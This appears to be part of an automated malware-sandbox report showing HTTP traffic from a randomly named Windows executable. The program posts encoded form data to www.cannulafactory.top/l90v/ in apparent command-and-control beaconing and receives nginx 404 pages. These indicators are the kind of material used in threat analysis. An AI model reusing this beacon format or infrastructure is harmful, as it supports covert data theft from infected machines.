                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:10.269926071 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:10.269941092 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:10.269953012 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.44976318.183.3.45806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:11.941679001 CEST781OUTPOST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 54 74 66 33 77 7a 4a 73 65 73 4a 52 42 47 6c 37 35 76 4b 45 51 73 61 52 63 53 67 2f 32 6e 43 69 41 3d
                                        Data Ascii: r8=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                                        Sep 3, 2024 13:55:12.801961899 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:12 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:12.801978111 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:12.801990986 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                        Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                        Sep 3, 2024 13:55:12.802005053 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.44976418.183.3.45806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:14.487772942 CEST10863OUTPOST /l90v/ HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.cannulafactory.top
                                        Referer: http://www.cannulafactory.top/l90v/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 30 33 44 71 6b 66 2b 50 31 45 4c 4f 64 75 71 46 7a 4e 35 67 72 78 46 53 32 5a 50 65 79 35 38 6c 73 2f 69 66 43 2f 30 70 49 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 42 70 4f 6b 65 54 42 57 49 66 35 35 5a 47 71 70 73 53 37 6e 31 31 36 63 59 37 6e 57 72 6d 55 5a 79 32 73 53 42 68 54 78 4b 45 38 46 79 41 74 72 44 31 6d 6f 4f 76 36 6c 77 6c 4f 52 54 4b 36 33 63 4f 6e 4c 69 6d 2f 41 36 4e 38 30 45 58 6b 63 56 4c 6e 49 [TRUNCATED]
                                        Data Ascii: r8=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc03Dqkf+P1ELOduqFzN5grxFS2ZPey58ls/ifC/0pId1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgBpOkeTBWIf55ZGqpsS7n116cY7nWrmUZy2sSBhTxKE8FyAtrD1moOv6lwlORTK63cOnLim/A6N80EXkcVLnIoci64tlyqZHnkeIdWiHox20C99XgZPlZYNmgWMPpAVfbkS0lsOHIltWAZfAJmhcXVkmW1zUPHxkA5eqn/5drzxFYy/iKAXkjZk3tTt1mFBORQTEs9m3/qcAYbcrij0Ct8vhfAJK/TRKYPiYgMLqHh3nqGAaX6+It7tQE7ztiBawXSg9EaXrlSh5f2NTYxzXMVTayT1VCuCCFSzM0hnxeU3/Qf+e2NFlltfE39LJW0jUW61/Y+PqyI2tNbyp6FjLjnT4gW+R+RlVicDl5AhxrTZGWCknwEC87pIZPUlX/YhatiTh6fVISFPEVJlPf5tQJCqwCau0rhW+tm3N5fxra1aSbavAALRa1omjf7IwAWscM0eFvOZMpBfLP/w+HY4gdLO5ekcSaoA2ysfLC5CfUaFND+0yHritGyVb52gHodiWHym286j+05o8hcT1CQNWKHcBR0v/OFfdyc6c7codfsPHwuRCFY20gzbRpuqfC3BqxRr5fsBupUgqcNi8ktpcFW12yxA26NaQzM+nuLm1sD5J6ZltCxumgxuIyMQ3it3+e9Wt6GoA0YhXDgkRzxj36sLFzn0t/hSrejnjDg3HLRYet0xTAfE4rzQUBkeq8FP58t02w+AOcJYxDzVdbVVznEdaL+NBSDniIyTjOsWsv1KxEiIhgPz5wPo [TRUNCATED]
                                        Sep 3, 2024 13:55:15.995841026 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:15.995855093 CEST224INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                        Sep 3, 2024 13:55:15.995872974 CEST1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                        Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                        Sep 3, 2024 13:55:15.995884895 CEST1236INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                                        Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
                                        Sep 3, 2024 13:55:15.995893955 CEST212INData Raw: 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 70 6f 77 65 72 65 64 62 79 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 5b 20 50 6f 77 65 72 65 64 20 62 79 20 52 65
                                        Data Ascii: g src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div> </div> </body></html>
                                        Sep 3, 2024 13:55:15.995929956 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:15.996488094 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.44976518.183.3.45806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:55:17.868993998 CEST488OUTGET /l90v/?r8=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.cannulafactory.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:55:18.742942095 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 03 Sep 2024 11:55:18 GMT
                                        Content-Type: text/html
                                        Content-Length: 3971
                                        Connection: close
                                        ETag: "6526681e-f83"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                        Sep 3, 2024 13:55:18.742969036 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                        Sep 3, 2024 13:55:18.742981911 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
